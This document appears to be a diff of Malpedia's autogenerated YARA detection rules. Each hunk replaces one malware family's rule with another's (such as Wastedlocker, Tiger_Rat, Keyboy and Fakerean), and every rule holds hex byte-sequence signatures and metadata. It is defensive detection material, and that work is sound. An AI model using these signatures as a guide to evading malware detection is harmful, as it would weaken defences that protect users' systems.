-		$sequence_0 = { 83ec0c 8b4508 8945f4 6838100000 6a40 }
-		$sequence_1 = { 8b45f4 8b08 890a 8b55fc 8b02 8945fc 8b4df4 }
-		$sequence_2 = { 740a 8b45fc 8b08 894dfc }
-		$sequence_3 = { eb42 6a10 8b55fc 83c208 }
-		$sequence_4 = { 837df800 7418 8b45f8 50 8b4dfc }
-		$sequence_5 = { 7507 33c0 e9???????? 8b55f4 8b4218 50 8b4df8 }
-		$sequence_6 = { 7507 33c0 e9???????? 8b55f4 8b4218 }
-		$sequence_7 = { 8b45fc 8b4d10 894804 8b55fc c7823410000001000000 6a10 8b450c }
-		$sequence_8 = { ffd0 6a06 6a01 6a02 8b4df4 }
-		$sequence_9 = { 837df800 7418 8b45f8 50 8b4dfc 51 }
+		$sequence_0 = { 0fb6cb 33d1 8a8c15fcf9ffff 8b95f4f9ffff 300c02 }
+		$sequence_1 = { 33f6 ffb640834100 ff15???????? 898640834100 }
+		$sequence_2 = { c74424480f000000 c744244400000000 c644243400 e8???????? c784242002000000000000 8d4c2444 }
+		$sequence_3 = { 99 2bc2 8bf0 d1fe 6a55 ff34f5903a4100 }
+		$sequence_4 = { 0f57c0 c745dc00000000 b802000000 8bf2 f30f7f45e8 6a50 }
+		$sequence_5 = { 8bfa 8bf1 837f1410 7207 8b07 8945fc }
+		$sequence_6 = { 83f801 7c1a 0103 8b8ddcf5ffff 50 8d85f4f7ffff 50 }
+		$sequence_7 = { f30f7f851cffffff 660f6f05???????? f30f7f852cffffff 660f6f05???????? f30f7f853cffffff 660f6f05???????? f30f7f854cffffff }
+		$sequence_8 = { 660f6f05???????? f30f7f850cfaffff 56 660f6f05???????? f30f7f851cfaffff }
+		$sequence_9 = { 8a4806 8a4007 0fb6f0 c1e608 0fb6c1 03f0 0fb6c2 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 247808
 }
-rule MALPEDIA_Win_Hlux_Auto : FILE
+rule MALPEDIA_Win_Forest_Tiger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d5f33612-2e58-5a58-b025-51b8c84d8ab0"
+		id = "c5055f82-5e25-5cec-b6f9-75913bef33b5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hlux_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.forest_tiger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.forest_tiger_auto.yar#L1-L149"
 		license_url = "N/A"
-		logic_hash = "6289602931f864ef390f887bdc3596feba8613d121e8e169b915693bee14e183"
+		logic_hash = "398de9d2907c8260eaacbe3112d8affc7b628942665baa833cce575671a0ed06"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138911,38 +139417,37 @@ rule MALPEDIA_Win_Hlux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0009 1b4e01 e405 9d }
-		$sequence_1 = { 0101 c9 c3 6a10 }
-		$sequence_2 = { 0104bb 8d1447 89542418 e9???????? }
-		$sequence_3 = { 8b8d84feffff 898d84feffff 8b0d???????? 8b1d???????? 899d0cffffff 898d64ffffff }
-		$sequence_4 = { 0000 008365f0fe8b 4d 0883c108e918 }
-		$sequence_5 = { 0130 8b13 8b08 85d2 }
-		$sequence_6 = { 8975fc 57 33d2 81fac4f4b942 741d 8d7a6f }
-		$sequence_7 = { 53 bb36194608 895dcc 56 33d2 33f6 }
-		$sequence_8 = { 010f 840f 0000 008365f0fe8b }
-		$sequence_9 = { 895584 bb2672b397 83fbab 7406 899d44ffffff 09c9 7506 }
-		$sequence_10 = { 8985f0feffff 33d2 33f6 81fe61979899 7428 81faa5601b7b }
-		$sequence_11 = { bf81b805ef 81f876496748 744d 8b15???????? }
-		$sequence_12 = { 21f6 7427 83f8af 7422 }
-		$sequence_13 = { 0088aa4b0023 d18a0688078a 46 018847018a46 }
-		$sequence_14 = { 7506 89b588feffff 83f922 0f8501010000 8b05???????? 897dc8 }
-		$sequence_15 = { 0104b9 33c9 83c408 85c0 }
+		$sequence_0 = { 833f01 0f94c0 84c0 7407 e8???????? }
+		$sequence_1 = { 6bc930 8975e0 8db1c0084400 8975e4 }
+		$sequence_2 = { 6aff 8d8df4fdffff 51 52 }
+		$sequence_3 = { 4c2be6 8bc3 c1e810 41880424 }
+		$sequence_4 = { 4c2be6 8bc3 c1e808 41880424 4c2be6 8bc3 }
+		$sequence_5 = { 6aff 8d942498010000 6880000000 52 }
+		$sequence_6 = { 6aff ff15???????? 894604 85c0 7429 }
+		$sequence_7 = { 6bc009 0fb68408c0724300 6a08 c1e804 }
+		$sequence_8 = { 4c2be6 4a8d7c27ff 4c8d6601 4c8bc7 }
+		$sequence_9 = { 4c2be6 418bc7 c1e808 41880424 4c2be6 418bc7 c1e810 }
+		$sequence_10 = { 4c2be6 c1eb18 41881c24 4c2be6 }
+		$sequence_11 = { 6bc00c 56 ff90f0664300 59 }
+		$sequence_12 = { 4c2be6 45883c24 4c2be6 418bc7 }
+		$sequence_13 = { 6aff 8d8c2478010000 6880000000 51 e8???????? 83c410 b8???????? }
+		$sequence_14 = { 4c2be7 4c8b4340 48b90000000000000080 0fb7d0 }
 
 	condition:
-		7 of them and filesize < 3147776
+		7 of them and filesize < 709632
 }
-rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
+rule MALPEDIA_Win_Shipshape_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cb0c66df-41c4-52ac-ac22-d6d2f5a2308d"
+		id = "aa7aa2cd-5e40-579e-a131-11724b603c86"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.puzzlemaker_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shipshape_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "59c32899b883bfb9bd7e74e09947139de6a13e19aa30e115675dc0025c3e011c"
+		logic_hash = "b3e2abc875f7ba78a51d88975fa6d3eb42407a4e92394786033a7e1704215a48"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138956,32 +139461,32 @@ rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f830c020000 4c8b7da8 4c8d0529b5ffff 8b4590 }
-		$sequence_1 = { 4c8d0500aaffff 48895108 0fb60a 83e10f 4a0fbe8401b8640100 }
-		$sequence_2 = { 8bd9 488d15d6060100 33c9 ff15???????? 85c0 }
-		$sequence_3 = { 488b8d00020000 ff15???????? 4585f6 740a 4183ff0f 0f8284fdffff }
-		$sequence_4 = { 498bd8 4c8bd2 0f84ac000000 4c634910 4c8d35c2bbffff 488b7a08 33f6 }
-		$sequence_5 = { 4883f8ff 74c8 488bd3 4c8d0502f20000 }
-		$sequence_6 = { 4883ec58 488b05???????? 4833c4 4889442440 e8???????? 488d05a1fdffff }
-		$sequence_7 = { 77ae 2bd1 83fa0f 777a 8b8c96101a0100 4803ce }
-		$sequence_8 = { 488b11 ff5210 ff15???????? b801000000 488b4d1f }
-		$sequence_9 = { 4181f804010000 72e1 448bc0 4c8d0d1f0e0200 }
+		$sequence_0 = { 8d542438 8d842400070000 52 50 e8???????? 8bfd 83c9ff }
+		$sequence_1 = { 8bcb 8d9424fc050000 83e103 50 f3a4 8d7c243c }
+		$sequence_2 = { 3d???????? 7cf1 56 8bf1 c1e603 3b9678b74000 0f851c010000 }
+		$sequence_3 = { 83e01f c1f905 8b0c8d60d54000 8a44c104 83e040 }
+		$sequence_4 = { 80fb78 7f0e 0fbec3 8a8018a24000 83e00f eb02 }
+		$sequence_5 = { 56 e8???????? 56 e8???????? 83c408 eb09 56 }
+		$sequence_6 = { e8???????? 6a04 68???????? e8???????? 6a0c }
+		$sequence_7 = { 6840420f00 51 52 e8???????? 50 }
+		$sequence_8 = { 8d942434030000 83e103 f3a4 bf???????? 83c9ff }
+		$sequence_9 = { 52 ff15???????? 8d8424b4000000 50 ff15???????? 0c06 }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 338386
 }
-rule MALPEDIA_Win_Synflooder_Auto : FILE
+rule MALPEDIA_Win_Adkoob_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5f633b9-dcb2-5076-bf0d-bd81d1f23849"
+		id = "9d0574c1-9926-5334-bfa7-9cdc9299a5a4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.synflooder_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adkoob_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f7c8ec3c0f9f10642bd0b77ad1f3921e90b05a4859f114057bd9d1a11d0bddfc"
+		logic_hash = "319076565d49e1f1e3a8b65fbc8806c865eb0ef04dd1a893be86dfc9ed47d730"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -138995,71 +139500,71 @@ rule MALPEDIA_Win_Synflooder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 eb17 bb00040000 c744241800280000 be3c000000 b8e8030000 }
-		$sequence_1 = { c7465c20b04000 83660800 33ff 47 897e14 897e70 }
-		$sequence_2 = { 50 e8???????? 46 83c404 89742410 3b74241c }
-		$sequence_3 = { 807e0a00 750b 56 e8???????? 59 85c0 7407 }
-		$sequence_4 = { ff15???????? 8b742420 56 68???????? }
-		$sequence_5 = { 33f6 85db 7e1b 8bff e8???????? 0fbec0 99 }
-		$sequence_6 = { c3 8bff 55 8bec 8b4508 33c9 3b04cdd0e24000 }
-		$sequence_7 = { 46 83c404 89742410 3b74241c 7539 6a64 }
-		$sequence_8 = { 0fb60b 40 80b910ee400000 74e8 8a13 0fb6ca 0fbe8910ee4000 }
-		$sequence_9 = { 7432 8d7304 66837efc01 751d }
+		$sequence_0 = { c78514ffffffd2000000 8d8d20ffffff 898d08ffffff 898d0cffffff 33c9 898d04ffffff 898d10ffffff }
+		$sequence_1 = { 8b4ddc 41 894ddc 85c0 7485 57 e8???????? }
+		$sequence_2 = { 8b75f4 56 ff7510 8d45ec 51 50 8bcb }
+		$sequence_3 = { 8b85e4feffff c1e104 898dd0feffff 8b4010 8b7c0104 8bcf e8???????? }
+		$sequence_4 = { 8bf0 e8???????? 8b4d98 3b4da0 7407 6a0e e8???????? }
+		$sequence_5 = { 8bc6 8bcf 2b85ccbfffff 50 8d85f4bfffff 50 e8???????? }
+		$sequence_6 = { e8???????? 6a00 53 8d4c242c e8???????? 8b7c2454 b828010000 }
+		$sequence_7 = { 8bd9 56 57 895df0 8b03 8b7304 8945d4 }
+		$sequence_8 = { ff75e8 53 6a01 ff75e0 ffd6 85c0 7431 }
+		$sequence_9 = { e8???????? 8bf0 83c40c 85f6 0f85ea000000 8b45dc ff45d8 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 1867776
 }
-rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE
+rule MALPEDIA_Win_Flash_Develop_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96a12e80-b15f-580e-920d-d6c0d35464b0"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mykings_spreader_auto.yar#L1-L132"
+		id = "4688ecaa-1305-56f1-b990-d34d1967b3cd"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flash_develop"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flash_develop_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff"
+		logic_hash = "1b0b49a0bdf8cbe355d0f549d184abf36cc5a8a27ac3e4b70ddcdc76ec6e38f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 }
-		$sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 }
-		$sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 }
-		$sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 }
-		$sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 }
-		$sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de }
-		$sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 }
-		$sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 }
-		$sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 }
-		$sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 }
+		$sequence_0 = { 55 56 33c9 57 0fb68170034200 99 8bf0 }
+		$sequence_1 = { 33fa 0fa4f708 c1e608 8934cd40484800 99 }
+		$sequence_2 = { c78424c8020000e0b04600 c78424cc02000068df4600 c78424d0020000b40d4700 c78424d4020000503e4700 c78424d8020000446e4700 c78424dc0200000c9d4700 c78424e0020000b0cc4700 }
+		$sequence_3 = { 891ccd28184800 892ccd2c184800 0fa4f710 c1e610 33f0 33fa 0fa4f708 }
+		$sequence_4 = { 33fa c1e308 892ccd2c204800 8bef 0fa4f708 891ccd28204800 8bde }
+		$sequence_5 = { 893ccd44484800 8bf0 8bfa 0fa4f708 }
+		$sequence_6 = { 892ccd34204800 8bef 0fa4f708 33fa 891ccd30204800 8bde c1e608 }
+		$sequence_7 = { c7842464010000240a4200 c7842468010000043a4200 c784246c01000070694200 c7842470010000cc9a4200 }
+		$sequence_8 = { 0fb68170054200 33ea 0fa4dd10 33fa 99 8934cd28304800 }
+		$sequence_9 = { 893ccd44404800 83c104 81f900010000 0f8c39f8ffff 5f 5e 5d }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 1111040
 }
-rule MALPEDIA_Win_Wastedlocker_Auto : FILE
+rule MALPEDIA_Win_Tiger_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8ef8d9a2-2e74-56fa-b8ce-a112e80f0d26"
+		id = "67f423d7-2fad-5807-a6c5-0c99b540e781"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wastedlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wastedlocker_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tiger_rat_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "48bd61023921acb8234a4ca4342276a30ad18fb5b65266be5de19c7db798e757"
+		logic_hash = "6751f9ead0a49726ec5dc792ec4931ab1c6ffa2fe50674026329e51b931ea082"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139073,34 +139578,40 @@ rule MALPEDIA_Win_Wastedlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c 56 8d85b0ebffff 53 }
-		$sequence_1 = { ff75f8 8bc7 2bc6 83c038 50 ff7508 }
-		$sequence_2 = { 8d45fc 50 8975f8 ff15???????? 50 ff7508 ff15???????? }
-		$sequence_3 = { 6808000200 c745f400200000 895df0 ff15???????? }
-		$sequence_4 = { 58 eb0b 8d4d0c 51 50 53 }
-		$sequence_5 = { ff742424 ff15???????? 8bf0 83feff 7428 ff742418 }
-		$sequence_6 = { 8bc3 e8???????? 85c0 7404 8365f000 6a00 8d45f4 }
-		$sequence_7 = { 6a08 eb02 6a57 5e 5f 8bc6 5e }
-		$sequence_8 = { 53 8bf8 ff15???????? eb08 ff15???????? 8bf8 }
-		$sequence_9 = { ff750c 8b4518 ff7508 e8???????? 6800020000 8bf0 8d85f8fdffff }
+		$sequence_0 = { 4883c104 488bd0 488bd8 e8???????? }
+		$sequence_1 = { 4883c104 48895c2458 48894c2468 483bc8 }
+		$sequence_2 = { 410fb6df 48c1e802 48c1e004 4803c8 }
+		$sequence_3 = { 41bb80000000 0fb65415d4 41d3fb 4122d3 }
+		$sequence_4 = { 2bdf eb05 bb00000100 488b542440 488b4c2450 }
+		$sequence_5 = { 4883c002 85c9 75ec 85d2 7422 ffc3 }
+		$sequence_6 = { 0f842d010000 48833d????????00 0f841f010000 48833d????????00 0f8411010000 48833d????????00 0f8403010000 }
+		$sequence_7 = { 410fb6cf 0845d6 418bc2 48c1e807 480bc8 498bc3 4183e302 }
+		$sequence_8 = { 8905???????? e8???????? 8b05???????? 418bd6 0b05???????? }
+		$sequence_9 = { 0f8423fdffff 4863c7 458bc5 488d9530060000 4803d0 488b442448 488d0d821f0100 }
+		$sequence_10 = { 448d420a 8905???????? c744242014000000 ff15???????? }
+		$sequence_11 = { 4053 4883ec20 4883610800 488d0556d30000 c6411000 }
+		$sequence_12 = { 4c8bc3 33d2 488bc8 e8???????? 33c9 c705????????51000000 ff15???????? }
+		$sequence_13 = { e8???????? 4885c0 752f 488d0dbac80100 8bd7 }
+		$sequence_14 = { 483305???????? 488bcb 488905???????? ff15???????? 488d1571c10000 483305???????? 488bcb }
+		$sequence_15 = { 0f1f4000 0fb6440d07 48ffc1 324415f7 4883f90f 490f44ce }
 
 	condition:
-		7 of them and filesize < 147456
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Keyboy_Auto : FILE
+rule MALPEDIA_Win_Fakerean_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3c6834d-0c67-5748-994c-227d3722e6aa"
+		id = "34f4a458-02de-570d-b3a3-0e20f22e1220"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keyboy_auto.yar#L1-L236"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fakerean_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b020d013796e2ff9bcbc5f453861ded4cb6f63e612a44995496ca47a3bf65fc0"
+		logic_hash = "ff26cea37ee30849e01ae5f84110a8c6d04e7d37a0c5e0d9f3ae27ca67cdd4d9"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139112,47 +139623,32 @@ rule MALPEDIA_Win_Keyboy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ff75d8 6a00 ff75c0 }
-		$sequence_1 = { 6a00 8945f2 8d45f8 50 6a0e }
-		$sequence_2 = { c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 }
-		$sequence_3 = { c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f }
-		$sequence_4 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 55 }
-		$sequence_5 = { c705????????c4b85363 c705????????3abf261f c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 }
-		$sequence_6 = { ffd0 e9???????? bbfeffffff eb05 }
-		$sequence_7 = { e8???????? 85c0 755e 83ff20 }
-		$sequence_8 = { 8bf2 c745f470646174 66c745f86500 8a02 }
-		$sequence_9 = { 56 57 68cc020000 8d852cfdffff 8bf2 }
-		$sequence_10 = { 740a 6683f806 7404 32c9 eb02 }
-		$sequence_11 = { f7d9 85db 0f44c2 23c8 }
-		$sequence_12 = { c745dc5368656c 8d45dc c745e06c333200 50 }
-		$sequence_13 = { 7207 b901000000 eb0f 3cfe 7509 }
-		$sequence_14 = { 8d85fcf7ffff 8bd9 6a00 50 e8???????? 83c40c 8d85fcf7ffff }
-		$sequence_15 = { 24a0 3ca0 7518 b800080000 }
-		$sequence_16 = { 2408 f6d8 1ac0 24dd }
-		$sequence_17 = { 84c0 75f0 8d55ec c745ec5c417070 c745f06c655c55 8bf2 }
-		$sequence_18 = { c745f447646933 8d45f4 66c745f83200 50 ff15???????? 8945bc }
-		$sequence_19 = { ff15???????? 8b15???????? 8b4dc0 8945b8 e8???????? }
-		$sequence_20 = { e8???????? 6a7c 8d4580 c7857cffffff736c6d00 }
-		$sequence_21 = { 85c0 741d ff15???????? 6afe 8d45f0 50 }
-		$sequence_22 = { 1ac0 24dd 88474e e8???????? }
-		$sequence_23 = { 0fbec0 0fafc8 80f185 880c3e 46 3bf2 }
-		$sequence_24 = { 41 8a043e 0fbe4c8de0 3401 0fbec0 0fafc8 80f185 }
+		$sequence_0 = { 83c40c 6a07 05???????? 59 ba30f8ffff }
+		$sequence_1 = { ab ab ab ab 6a08 59 }
+		$sequence_2 = { ff37 ff15???????? ff45fc 837dfc04 7cb7 53 ff15???????? }
+		$sequence_3 = { 8d45e4 50 6a00 56 ff15???????? }
+		$sequence_4 = { 742c 8b11 33db 83f81b 0f95c3 8d5c1b02 53 }
+		$sequence_5 = { 52 50 53 51 e8???????? 3bd7 }
+		$sequence_6 = { 83c11a ffb48ef0000000 50 ff15???????? 33c0 399e88040000 }
+		$sequence_7 = { 83c40c 83f801 7419 57 6a3c 68???????? e8???????? }
+		$sequence_8 = { c9 c21c00 55 8bec 53 56 8b7510 }
+		$sequence_9 = { ff33 ff15???????? 56 ff33 ff15???????? 897df8 8b45f0 }
 
 	condition:
-		7 of them and filesize < 2170880
+		7 of them and filesize < 4071424
 }
-rule MALPEDIA_Win_Urausy_Auto : FILE
+rule MALPEDIA_Win_Maoloa_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d79fe72f-f8e2-58e2-a433-7994c2651777"
+		id = "7a2b1982-b20a-5388-b0ef-52864066a031"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.urausy_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maoloa"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maoloa_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "4006e3f78a3f573ba923955b3cfcab3f192d2740ed20a89eb62b4be1b215c9a4"
+		logic_hash = "db1d30099f88e9731a955a855e8ff6fe8bdddafcf359d763b17d4e94ad2fc492"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139166,32 +139662,32 @@ rule MALPEDIA_Win_Urausy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 33c0 c9 c20800 8d45ec 50 }
-		$sequence_1 = { 8d8500feffff 50 e8???????? 83f800 }
-		$sequence_2 = { ff75e4 e8???????? 8945e8 ff35???????? }
-		$sequence_3 = { 6894020000 ff75e8 ff75ec 6800000050 }
-		$sequence_4 = { e8???????? 8945e8 8945fc 68007f0000 6a00 e8???????? }
-		$sequence_5 = { 6a00 68???????? e8???????? 85c0 0f8461010000 }
-		$sequence_6 = { e8???????? 833d????????01 0f8599030000 68d4070000 ff35???????? e8???????? a3???????? }
-		$sequence_7 = { 68b80b0000 e8???????? c9 c20400 }
-		$sequence_8 = { 6a0f e8???????? 8945e4 8345ec61 8345e82d 6a00 ff35???????? }
-		$sequence_9 = { eb1b 3d57000780 7502 eb12 }
+		$sequence_0 = { e8???????? 8be5 5d c3 bf00afffff 8d8dc8fbffff e8???????? }
+		$sequence_1 = { 50 56 6a01 6a00 68???????? ffb598e3ffff ff15???????? }
+		$sequence_2 = { 33c3 d1e9 83f007 8bde 8b9c8310100000 8bc2 335cbdbc }
+		$sequence_3 = { 0f8eddfeffff 8b44244c 8d4c2458 68???????? 03c1 50 ff15???????? }
+		$sequence_4 = { 8b4de8 8b0485d8ed4200 f644082840 7409 803f1a 7504 }
+		$sequence_5 = { 8bd7 8d4d90 e8???????? 8bf0 6a6c 8d4590 }
+		$sequence_6 = { 8d45f0 50 e8???????? 83c404 85c0 7502 8937 }
+		$sequence_7 = { 50 8d8570ffffff 50 e8???????? 83c40c 8d8d70ffffff 33d2 }
+		$sequence_8 = { 8bd7 e8???????? 85c0 0f898e020000 ba01000000 8bce e8???????? }
+		$sequence_9 = { 3bc1 0f47c1 a3???????? c705????????000000c0 c705????????000000c0 c705????????80000088 8d8594e3ffff }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 586752
 }
-rule MALPEDIA_Win_Dairy_Auto : FILE
+rule MALPEDIA_Win_Webc2_Bolid_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "133b9699-4dcc-594b-b21a-95c3efab14f3"
+		id = "dd418f60-6f65-5186-bdc9-d3ec62c1747f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dairy_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_bolid"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_bolid_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "1c31903f94f05665f06e9add90cd1dfd10d14af78de58f211ffc3b43b0fd9163"
+		logic_hash = "d5bb74d5c966a3742a98e85309bd13720d314db10e6aa05f8d544024f31adb6b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139205,34 +139701,34 @@ rule MALPEDIA_Win_Dairy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 51 ff15???????? 85c0 741a e9???????? }
-		$sequence_1 = { 6a61 b932000000 33c0 8dbc2480030000 6a74 6a61 6a64 }
-		$sequence_2 = { 8b0d???????? 56 ff5110 8b542414 }
-		$sequence_3 = { 53 8b5c2410 55 56 57 8bfb 33f6 }
-		$sequence_4 = { 51 e8???????? 83c418 85c0 0f8e4f010000 8b550c 6800040000 }
-		$sequence_5 = { b900020000 33c0 8dbc2420020000 f3ab }
-		$sequence_6 = { 68???????? 51 e8???????? 83c40c 85c0 0f85bb000000 }
-		$sequence_7 = { 0f8ecefeffff bf???????? 83c9ff 33c0 f2ae f7d1 49 }
-		$sequence_8 = { 55 56 8b742420 8b44241c }
-		$sequence_9 = { 7437 8b442448 6a40 50 ffd6 }
+		$sequence_0 = { 897344 8b3d???????? 33c0 897dec 6a01 f2ae f7d1 }
+		$sequence_1 = { f3a5 8bca 83e103 f3a4 8b4dbc }
+		$sequence_2 = { 8a4c2413 53 884c2460 8d4c2460 c684240002000001 }
+		$sequence_3 = { 8d4c2404 e8???????? 8d4c2404 c784242803000000000000 e8???????? }
+		$sequence_4 = { 57 897de8 e8???????? 84c0 7427 }
+		$sequence_5 = { 8b4dec 8b75e4 03c1 894508 }
+		$sequence_6 = { 03c1 c60000 8b4dbc c645fc00 85c9 7422 }
